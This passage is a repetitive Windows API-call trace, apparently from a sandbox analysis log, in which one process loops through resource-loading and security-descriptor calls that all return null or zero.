(hResData=0x0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.942] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.942] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.942] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.942] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.942] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.942] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.943] LockResource (hResData=0x0) returned 0x0 [0069.943] FreeResource (hResData=0x0) returned 0 [0069.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.944] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.944] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.944] LockResource (hResData=0x0) returned 0x0 [0069.944] FreeResource (hResData=0x0) returned 0 [0069.944] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.945] LockResource (hResData=0x0) returned 0x0 [0069.945] FreeResource (hResData=0x0) returned 0 [0069.945] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.945] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.945] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.946] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.946] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.946] LockResource (hResData=0x0) returned 0x0 [0069.946] FreeResource (hResData=0x0) returned 0 [0069.946] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.947] LockResource (hResData=0x0) returned 0x0 [0069.947] FreeResource (hResData=0x0) returned 0 [0069.947] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.947] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.947] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.948] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.948] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.948] LockResource (hResData=0x0) returned 0x0 [0069.948] FreeResource (hResData=0x0) returned 0 [0069.948] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.948] LoadResource 